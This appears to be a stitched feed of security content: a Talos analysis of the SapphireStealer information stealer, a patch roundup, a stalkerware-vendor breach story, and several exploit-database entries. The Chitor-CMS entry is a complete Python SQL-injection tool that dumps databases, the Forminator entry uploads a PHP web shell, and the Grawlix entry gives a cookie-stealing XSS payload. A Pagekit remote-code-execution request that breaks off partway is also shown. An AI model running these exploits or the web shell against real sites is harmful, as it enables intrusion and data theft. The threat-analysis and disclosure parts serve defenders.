SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for

*   SapphireStealer, an open-source information stealer, has been observed across public malware repositories with increasing frequency since its initial public release in December 2022.
*   Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion.
*   We assess with moderate confidence that multiple entities are using SapphireStealer, who have improved and modified the original code base separately, extending it to support additional data exfiltration mechanisms leading to the creation of several variants.
*   In some cases, SapphireStealer appears to be delivered as part of a multi-stage infection process, with threat actors leveraging open-source malware downloaders like FUD-Loader to deliver SapphireStealer to potential victims.

**SapphireStealer goes open-source, attackers take notice**

Information stealers have become increasingly popular across the threat landscape over the past several years. While these threats have been around for a very long time, Cisco Talos has recently observed an increase in the emergence of new stealers being offered for sale or rent on various underground forums and marketplaces. Stealers are often seen as an attractive option for financially motivated threat actors, as they provide a simple means to compromise and distribute sensitive information and account-related details to adversaries. These credentials often include corporate account credentials, access tokens and other data that can then be used to further compromise corporate networks. In many cases, the credential logs generated by information stealers are monetized and the network access they provide is sold to other threat actors who may use them to begin operating toward various post-compromise mission objectives, such as espionage or ransomware/extortion.

SapphireStealer is an example of a new information stealer, primarily designed to facilitate the theft of various browser credential databases and files that may contain sensitive user information. SapphireStealer’s codebase was published on GitHub on Dec. 25, 2022.

As is often the case following the release of a new open-source malware codebase, threat actors acted quickly, beginning to experiment with this stealer, extending it to support additional functionality, and using other tooling to make the detection of SapphireStealer infections more difficult.

Newly compiled versions of SapphireStealer began being uploaded to public malware repositories beginning in mid-January 2023, with consistent upload activity being observed through the first half of 2023. Compilation artifacts associated with these samples indicate that this malware codebase is currently being used by multiple threat actors. Multiple variants of this threat are already in the wild, and threat actors are improving on its efficiency and effectiveness over time.  

While most of the samples featured forged compilation timestamps, using the date on which the samples were initially uploaded to public repositories and compilation artifacts like PDB pathways allowed us to cluster malware activity and identify distinct development activity occurring.

**SapphireStealer enables simple but effective credential and data theft**

SapphireStealer is an information stealer that was written in .NET. It offers straightforward but effective functionality capable of stealing sensitive information from infected systems including:

*   Host information.
*   Screenshots.
*   Cached browser credentials.
*   Files stored on the system that match a predefined list of file extensions.

When the malware is initially executed, it first attempts to determine if any existing browser processes are running on the system. It queries the currently running process list for any process names that match the following list:

*   chrome
*   yandex
*   msedge
*   opera

If any matching processes are detected, the malware uses Process.Kill() to terminate them. This code execution for Google Chrome is shown below.

Next, the malware calls Chromium.Get() to check for various browser database file directories under %APPDATA% or %LOCALAPPDATA%. The malware uses a hard-coded list of paths to identify the presence of credential databases for the following browser applications:

*   Chrome
*   Opera
*   Yandex
*   Brave Browser
*   Orbitum Browser
*   Atom Browser
*   Kometa Browser
*   Microsoft Edge
*   Torch Browser
*   Amigo
*   CocCoc
*   Comodo Dragon
*   Epic Privacy Browser
*   Elements Browser
*   CentBrowser
*   360 Browser

The malware creates a working directory at the following location to stage the data that will ultimately be exfiltrated:

%TEMP%\sapphire\work

The contents of any credential databases that are discovered are dumped. This information is then stored in a text file within the malware’s working directory called Passwords.txt.

Next, the malware attempts to capture a screenshot from the system and stores it within the same working directory within a file called Screenshot.png.

The malware creates a new subdirectory called \`Files\` within the malware’s working directory. A file grabber is then executed that attempts to locate any files stored within the victim’s Desktop folder that match a list of file extensions. The list varied across analyzed samples, but an example list is shown below:

*   .txt
*   .pdf
*   .doc
*   .docx
*   .xml
*   .img
*   .jpg
*   .png

Once the file grabber has completed execution, the malware then creates a compressed archive called log.zip containing all of the logs that were previously written to the malware’s working directory.

This data is then transmitted to the attacker via Simple Mail Transfer Protocol (SMTP) using credentials defined in the portion of code responsible for crafting and sending the message.

The following host-related information is collected and included in the body of the email message:

*   IP address
*   Hostname
*   Screen resolution
*   OS version and CPU architecture
*   ProcessorId
*   GPU Information

Once the logs have been successfully exfiltrated, the malware then deletes the working directory created earlier and terminates execution.

**SapphireStealer extended to support additional exfiltration methods**

Since initial samples began being uploaded to public malware repositories and scanning platforms, we’ve observed several notable modifications made by various threat actors. Most of the development effort appears to have been focused on facilitating more flexible data exfiltration and alerting for attackers that achieve new SapphireStealer infections. As this malware is open-source and being used by multiple distinct threat actors, much of this development activity has occurred independently and new functionality is not present in sample clusters associated with other threat actors.

In one case, we observed a SapphireStealer sample where the data collected using the previously described process was exfiltrated using the Discord webhook API, a method we previously highlighted here.

In this case, the Discord webhook URL (SendLog.url) was:

hxxps[:]//discord[.]com/api/webhooks/1123664977618817094/La_3GaXooH42oGRiy8o7sazh1Cg0V_mzkH67VryfSB1MCOlYee1_JPMCNsfOTji7J9jO

In several cases, we also observed SapphireStealer samples that featured the ability to alert attackers to newly acquired infections by transmitting the log data via the Telegram posting API.

In addition, we also observed variations in the file extensions being targeted for collection and exfiltration by the FileGrabber functionality present within SapphireStealer. While some were minimal, only containing a few file extensions, others contained a myriad of different file formats that the attacker could obtain.

Likewise, earlier versions of SapphireStealer featured redundant code execution, repeated superfluous executions of the same operations multiple times, and overall inefficiencies. During our analysis of other SapphireStealer samples over time, we observed repeated evidence that various threat actors had taken steps to streamline the malware’s operations, refactor the code significantly, and otherwise improve upon the core functionality of the stealer.

**FUD-Loader used in multi-stage infections**

In several cases, we observed threat actors attempting to leverage a malware downloader, called FUD-Loader which was also made available via the same GitHub account. This downloader was initially committed to GitHub on January 2, 2023, shortly after the initial code commit of SapphireStealer. Since its release, it’s been used by a variety of threats during the initial stages of the infection process to retrieve additional binary payloads from attacker-controlled distribution servers.

This loader, like SapphireStealer, was written in .NET and features fairly simplistic operations. It is essentially responsible for leveraging HTTP/HTTPS communications to retrieve additional executables from attacker-controlled infrastructure, saving the retrieved content to disk, and then executing it to continue the infection process.

In most of the cases where this loader was used, it retrieved the SapphireStealer binary payloads being hosted on the infrastructure described in the next section, allowing us to attribute those samples to the same threat actor.

Throughout the course of 2023, we have also observed this downloader being used to deliver various other threats such as DcRat, njRAT, DarkComet, AgentTesla and more.

**A case study in operational security (OPSEC) failure**

In one cluster of malware activity we analyzed, we observed multiple failures on the part of the threat actor to maintain sound operational security. In one sample, we observed the presence of the following Program Database (PDB) pathway still present post-compilation:

C:\Users\roman\OneDrive\Рабочий стол\straler\net452\new_game.pdb

This sample was configured to use SMTP for data exfiltration and leveraged the following hardcoded credentials.

These credentials were also hardcoded into another sample we analyzed.

We observed that this second sample featured a different PDB, which contained a specific typographical error in the PDB pathway.

D:\C# proect\Sapphire\obj\Debug\Sapphire.pdb

An earlier sample featured the same PDB pathway and the same typographical error. In this case, the threat actor hardcoded personally identifiable SMTP account information for data exfiltration.

Looking for additional accounts that featured the handle/alias “romanmaslov200” led us to a variety of personal accounts that may be associated with the threat actor, such as an account for Steam, a popular video game storefront.

Two of these three samples were also observed being hosted at the following URL at various times:

In addition to the aforementioned Steam account, we also identified a matching account on a Russian language freelance forum. This account was being used to advertise freelance web development services. The user profile also lists the domain observed hosting SapphireStealer samples and various dependency components retrieved for parsing credential databases and exfiltrating the data.

One of the byproducts of readily available and open-source malware codebases is that the barrier to entry into financially motivated cybercrime has continued to decrease over time. This trend has become apparent when analyzing campaigns run by individuals or groups that demonstrate inexperience in establishing operational security throughout the various stages of the attack lifecycle. While it may take less operational expertise to conduct information stealer attacks, they can be extremely damaging to corporate environments as the data stolen is often leveraged for additional attacks at a later time.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort SIDs are applicable to this threat: 62243-62247.

**Orbital Queries**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here.

**Indicators of Compromise**

IOCs for this research can also be found at our Github repository here

SapphireStealer: Open-source information stealer enables credential and data theft

Plus: Mozilla patches more than a dozen vulnerabilities in Firefox, and enterprise companies Ivanti, Cisco, and SAP roll out a slew of updates to get rid of some high-severity bugs.

August has ended the summer in style with multiple patches issued by Microsoft, Google Chrome, and its competitor Firefox to fix serious issues, some of which are being used in attacks.

While there was no Apple iPhone update at the time of writing, some major enterprise fixes were released during the month. These include patches for exploited flaws in Ivanti products, as well as fixes for vulnerabilities in SAP and Cisco software.

Read on for everything you need to know about the patches issued in August.

Microsoft

Microsoft’s August Patch Tuesday saw the software giant fixing dozens of vulnerabilities, including two already being used in real-world attacks. The first is a Defense in Depth update to CVE-2023-36884, a remote code execution (RCE) flaw in Windows Search that could allow attackers to bypass Microsoft’s Mark of the Web security feature. If it sounds familiar, that’s because Microsoft already fixed the vulnerability in July. But installing the latest update “stops the attack chain” leading to the issue, Microsoft said.

The second flaw, CVE-2023-38180 is an issue in .NET and Visual Studio that could allow an adversary to perform denial of service.

Six of the issues fixed in August’s Patch Tuesday are rated as critical, including CVE-2023-36895—an RCE flaw in the Outlook email client. Meanwhile, CVE-2023-35385, CVE-2023-36910, and CVE-2023-36911 are RCE issues in the Microsoft Message Queuing service, according to the Security Update Guide.

The fifth and sixth critical issues fixed by Microsoft in August are CVE-2023-29328 and CVE-2023-29330, both of which are RCE flaws in Teams.

Google Chrome

August kicked off with a slew of updates for Chrome 115 including nine rated as having a high impact. The 17 patches include three type-confusion flaws in V8: CVE-2023-4068, CVE-2023-4069, and CVE-2023-4070. And CVE-2023-4071 is a heap buffer overflow issue in Visuals and CVE-2023-4076 is a use-after-free flaw in WebRTC.

A couple of weeks later, Google issued Chrome 116 to patch 26 vulnerabilities, eight of which are rated as having a high impact. The most serious issues include CVE-2023-2312—a use-after-free bug in Offline—and CVE-2023-4349, a use-after-free flaw in Device Trust Connectors. A third, CVE-2023-4350, is an inappropriate implementation bug in Fullscreen.

Then, on August 23, Google released the first of its more regular weekly security updates, patching five flaws. The four vulnerabilities rated as having a high impact include two use-after-free bugs and two out-of-bounds memory access issues.

Firefox

Google Chrome’s privacy-focused competitor Firefox also had a hectic August, fixing more than a dozen vulnerabilities in Firefox 116. The issues patched by Firefox owner Mozilla include CVE-2023-4045, an issue in Offscreen Canvas rated as high, and CVE-2023-4047, a bug in popup notifications delay calculation that could allow an attacker to trick a user into granting permissions.

The update also patches memory safety bugs tracked as CVE-2023-4056, CVE-2023-4057, and CVE-2023-4058. The flaws fixed in the latest update “showed evidence of memory corruption,” Mozilla said. “We presume that with enough effort, some of these could have been exploited to run arbitrary code.”

Google Android

Google has issued 40 updates for its Android operating system including patches for serious flaws in the Framework, System, and Kernel. Tracked as CVE-2023-21273, the most severe bug fixed in August is a critical security vulnerability in the System component that could lead to RCE with no additional execution privileges needed. User interaction is not required for exploitation, Google said in its Android Security Bulletin.

Meanwhile, CVE-2023-21282 is an RCE flaw in the Media Framework also marked as having a critical impact. Another critical issue in the Kernel, tracked as CVE-2023-21264, could lead to local escalation of privilege, although System execution privileges are needed.

Google Fixes Serious Security Flaws in Chrome and Android

Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

**Chitor-CMS v1.1.2 - Pre-Auth SQL Injection**

**Platform:****PHP**

**Date:****2023-04-20**

  

    #!/usr/bin/python3
    
    #######################################################
    #                                                     # 
    #  Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection          #
    #  Date: 2023/04/13               #
    #  ExploitAuthor: msd0pe                                  #
    #  Project: https://github.com/waqaskanju/Chitor-CMS  #
    #  My Github: https://github.com/msd0pe-1             #
    #  Patched the 2023/04/16: 69d3442 commit             #
    #                                                     #
    #######################################################
    
    __description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
    __author__ = 'msd0pe'
    __version__ = '1.1'
    __date__ = '2023/04/13'
    
    class bcolors:
        PURPLE = '\033[95m'
        BLUE = '\033[94m'
        GREEN = '\033[92m'
        OCRA = '\033[93m'
        RED = '\033[91m'
        CYAN = '\033[96m'
        ENDC = '\033[0m'
        BOLD = '\033[1m'
        UNDERLINE = '\033[4m'
    
    class infos:
        INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
        ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
        GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
        PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
    
    import re
    import requests
    import optparse
    from prettytable import PrettyTable
    
    def DumpTable(url, database, table):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        columns = []
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    columns.append(i)
                    pass
        except:
            pass
        x.field_names = columns
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    x.add_rows([i])
        except ValueError:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    i = i.split("xzmdpl")
                    i.append("")
                    x.add_rows([i])        
        print(x)
    
    def ListTables(url, database):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["TABLES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def ListDatabases(url):
        header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
        x = PrettyTable()
        x.field_names = ["DATABASES"]
        payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
        u = requests.get(url + payload, headers=header)
        try:
            r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
            r = r[0].replace('\"',"").split(',')
            if r == []:
                pass
            else:
                for i in r:
                    x.add_row([i])
        except:
            pass
        print(x)
    
    def Main():
        Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
        Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
        Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
        Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
        Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
        Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
        Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
        (options, args) = Menu.parse_args()
    
        Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
                                                             python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
        """)
        Menu.add_option_group(Examples)
    
        if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
            Menu.print_help()
            print('')
            print('  %s' % __description__)
            print('  Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
            print('  Any malicious or illegal activity may be punishable by law')
            print('  Use at your own risk')
    
        elif len(args) == 0:
            try:
                if options.url != None:
                    if options.l_databases != None:
                        ListDatabases(options.url)
                    if options.database != None:
                        if options.l_tables != None:
                            ListTables(options.url, options.database)
                        if options.table != None:
                            if options.dump != None:
                                DumpTable(options.url, options.database, options.table)
            except:
                print("Unexpected error")
    
    if __name__ == '__main__':
        try:
            Main()
    
        except KeyboardInterrupt:
            print()
            print(infos.PROCESS + "Exiting...")
            print()
            exit(1)

CVE-2023-31714: OffSec’s Exploit Database Archive

Categories: Personal
Tags: spyware

Tags:  spying

Tags:  surveillance

Tags:  Brazil

Tags:  phone

Tags:  mobile

We take a look at another compromise of a mobile spyware app maker, and ask whether this action comes with hidden danger.



(Read more...)




The post Victim records deleted after spyware vendor compromised appeared first on Malwarebytes Labs.

Anonymous hackers have breached the servers of spyware app “WebDetetive”, accessing the user database.

However, this doesn’t appear to be a typical compromise along the lines of stealing the data, according to Tech Crunch. Instead, it’s part of a slow move toward “spying” apps being attacked and taken down by compromise-literate folks who don’t approve of the apps business practices.

Spyware apps are installed on a potential victim’s phone without permission and lurk invisibly, collecting data and sending it back to the app operator. They’re often marketed at employers or parents, but are also used by abusive partners or ex-partners, and can be a nightmare scenario for those affected.

The hackers responsible for this attack claim to have broken into the server via “several security vulnerabilities” which allowed them to initially gain a foothold. From there they went on to exploit additional flaws in the app developer’s web dashboard, downloading all records including customer email addresses.

To be clear here, “customer” would mean the people who have decided to sign up and make use of the tool, not the victims. Indeed, TechCrunch notes that the 1.5GB cache of data related to this heist contains customer IP addresses and purchase history alongside all devices compromised by a customer, their phone model, and the data type collected.

The victims' records had another fate in store. Namely, deletion from the network, which means the compromised mobiles can no longer upload data to the WebDetetive network. The cache of WebDetetive customer data does not include any data swiped from phones via WebDetetive.

In terms of numbers, roughly 76k devices were compromised at the time the breach happened, with somewhere in the region of 74k customer emails showing in the cache. While the breach cannot currently be independently verified, TechCrunch says it has already verified the authenticity of the stolen data.

Additionally, further investigation suggests the elusive WebDetetive may allegedly have some ties to a similar spying app allied Ownspy. TechCrunch claims WebDetetive to be a “largely repackaged” copy of OwnSpy’s software. Perhaps more tellingly, WebDetetive’s user agent refers to itself as OwnSpy while uploading dummy data to WebDetetive.

If you’re unfamiliar with the term, a user agent is how a program tries to identify itself online. If I use Chrome as a browser, then when I visit a website, it will see my Chrome user agent. If the website is mobile only, it may redirect me or refuse entry if I’m not running an identifiable mobile browser.

This isn’t the only recent attack on a mobile spying application, nor the only attack generally. A few weeks back we covered a similar incident involving a server breach attack on an app called LetMeSpy. The story largely played out the same as the above. Unknown attackers breached the server, and the company behind the app shut down a little while after.

On the surface it may sound great that someone is taking the spyware authors to task, but there is a big note of caution here. A sudden deletion or breakage of an app could have serious consequences for the person being monitored. The person who put the spyware there in the first place may assume tampering by their target which could place them in additional danger. These situations must be handled carefully, and perhaps mass deletions don’t qualify.

**How to prevent spyware and stalkerware-type apps**

*   Set a screen lock on your phone and don't let anyone else access it
*   Keep your phone up-to-date. Make sure you're always on the latest version of your phone's software.
*   Use an antivirus on your phone. Malwarebytes for Android shows you exactly what information you're sharing with each app on Android, so you can keep an eye on your privacy.

**Coalition Against Stalkerware**

Malwarebytes is a founding member of the Coalition Against Stalkerware. We continue to share intelligence with the Coalition Against Stalkerware to improve industry-wide detections while also guiding the domestic abuse support networks within the coalition through thorny, technical questions of detection, removal, and prevention.

**We don’t just report on threats—we provide it**

Cybersecurity risks should never spread beyond a headline. Keep threats off your Android devices by downloading Malwarebytes for Android today.

Victim records deleted after spyware vendor compromised

The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to file type validation occurring after a file has been uploaded to the server in the upload_post_image() function in versions up to, and including, 1.24.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

    # Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
    # Date: 2023-07-20
    # Exploit Author: Mehmet Kelepçe
    # Vendor Homepage: https://wpmudev.com/project/forminator-pro/
    # Software Link: https://wordpress.org/plugins/forminator/
    # Version: 1.24.6
    # Tested on: PHP - Mysql - Apache2 - Windows 11
    
    HTTP Request and vulnerable parameter:
    -------------------------------------------------------------------------
    POST /3/wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost
    Content-Length: 1756
    sec-ch-ua:
    Accept: */*
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryTmsFfkbegmAjomne
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199
    Safari/537.36
    sec-ch-ua-platform: ""
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/3/wordpress/2023/01/01/merhaba-dunya/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: wp-settings-time-1=1689794282;
    wordpress_test_cookie=WP%20Cookie%20check; wp_lang=tr_TR
    Connection: close
    
    .
    .
    .
    .
    .
    
    ------WebKitFormBoundaryTmsFfkbegmAjomne
    Content-Disposition: form-data; name="postdata-1-post-image";
    filename="mehmet.php"
    Content-Type: application/octet-stream
    
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    
    
    
    Source Code:
    wp-content/plugins/forminator/library/modules/custom-forms/front/front-render.php:
    --------------------------------------------------------------------
            public function has_upload() {
    $fields = $this->get_fields();
    
    if ( ! empty( $fields ) ) {
    foreach ( $fields as $field ) {
    if ( 'upload' === $field['type'] || 'postdata' === $field['type'] ) {
    return true;
    }
    }
    }
    
    return false;
    }
    Vulnerable parameter: postdata-1-post-image
    
    and
    
    
    Source code:
    wp-content/plugins/forminator/library/fields/postdata.php:
    -------------------------------------------------------------------
    if ( ! empty( $post_image ) && isset( $_FILES[ $image_field_name ] ) ) {
    if ( isset( $_FILES[ $image_field_name ]['name'] ) && ! empty(
    $_FILES[ $image_field_name ]['name'] ) ) {
    $file_name = sanitize_file_name( $_FILES[ $image_field_name ]['name'] );
    $valid     = wp_check_filetype( $file_name );
    
    if ( false === $valid['ext'] || ! in_array( $valid['ext'],
    $this->image_extensions ) ) {
    $this->validation_message[ $image_field_name ] = apply_filters(
    'forminator_postdata_field_post_image_nr_validation_message',
    esc_html__( 'Uploaded file\'s extension is not allowed.', 'forminator' ),
    $id
    );
    }
    }
    }
    
    Vulnerable function: $image_field_name
    -------------------------------------------------------------------------
    
    Payload file: mehmet.php
    <?php
    $_GET['function']($_GET['cmd']);
    ?>
    -------------------------------------------------------------------------

CVE-2023-4596: OffSec’s Exploit Database Archive

Use after free in MediaStream in Google Chrome prior to 116.0.5845.140 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

**Chrome Releases**

Release updates from the Chrome team

CVE-2023-4572: Stable Channel Update for Desktop

Grawlix version 1.5.1 suffers from a cross site scripting vulnerability.

    ## Title: grawlix-1.5.1 XSS-Reflected## Author: nu11secur1ty## Date: 08/29/2023## Vendor: https://getgrawlix.com/## Software:## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the ref request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload vy7tu"><script>alert(1)</script>e284ovbptuv was submittedin the ref parameter. This input was echoed unmodified in theapplication's response. The attacker can steal PHPSESSID cookie andcan trick the victim into visiting his or some other dangerous URLaddress.STATUS: HIGH-Vulnerability[+]Exploit:```POSTGET /grawlix-1.5.1/grawlix-cms-1.5.1/_admin/panl.login.php?grlx_xss_token=&ref=book.view.phpvy7tu%22%3E%3Cscript%3Ealert(%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65)%3C%2fscript%3Ehttp://pornhub.com&username=UXBhcRhk&extra=y9R%21m8c%21W6&submit=LoginHTTP/1.1Host: localhostsec-ch-ua:sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=oq08tie8elf34amgmti9e8bel2Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/getgrawlix/getgrawlix-1.5.1)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/grawlix-cms-151-xss-reflected.html)## Time spend:00:27:00

Grawlix 1.5.1 Cross Site Scripting

Mozilla Firefox only stores up to 1024 HSTS entries. When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.

    # VULNERABILITYMozilla Firefox only stores up to 1024 HSTS entries.When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.# IMPACTThe HSTS header ensures that once a page has been visited, the browser will attempt to connect to it using HTTPS.The limit means that Firefox effectively does not store any further HSTS headers, as new ones permanently override each other.Sites without HSTS protection are vulnerable to machine-in-the-middle attacks, especially downgrade attacks such as SSL Stripping.# MORETo find out if you are affected, check the number of HSTS entries:* Linux: `wc -l ~/.mozilla/firefox/{profile}/SiteSecurityServiceState.txt`* Windows: `find /c /v " " ".\AppData\Roaming\Mozilla\Firefox\Profiles\{profile}\SiteSecurityServiceState.txt"`This behavior was first reported by Sheila Ayelen Berta and Sergio De Los Santos at Black Hat Europe 2017.I filed a bug report in February 2023 that is currently being worked on.# REFERENCES* Bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1818984* Mastodon thread: https://infosec.exchange/@kpwn/110010433703922665* Blog post: https://kpwn.de/2023/03/http-strict-transport-security/#1-the-limited-number-of-hsts-entries* Black Hat Europe 2017: Breaking Out HSTS (and HPKP) On Firefox, IE/Edge and (Possibly) Chrome   * Slides: https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf   * Talk: https://www.youtube.com/watch?v=dPnU9_pXJ5k

Mozilla Firefox HSTS Enty Limit

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
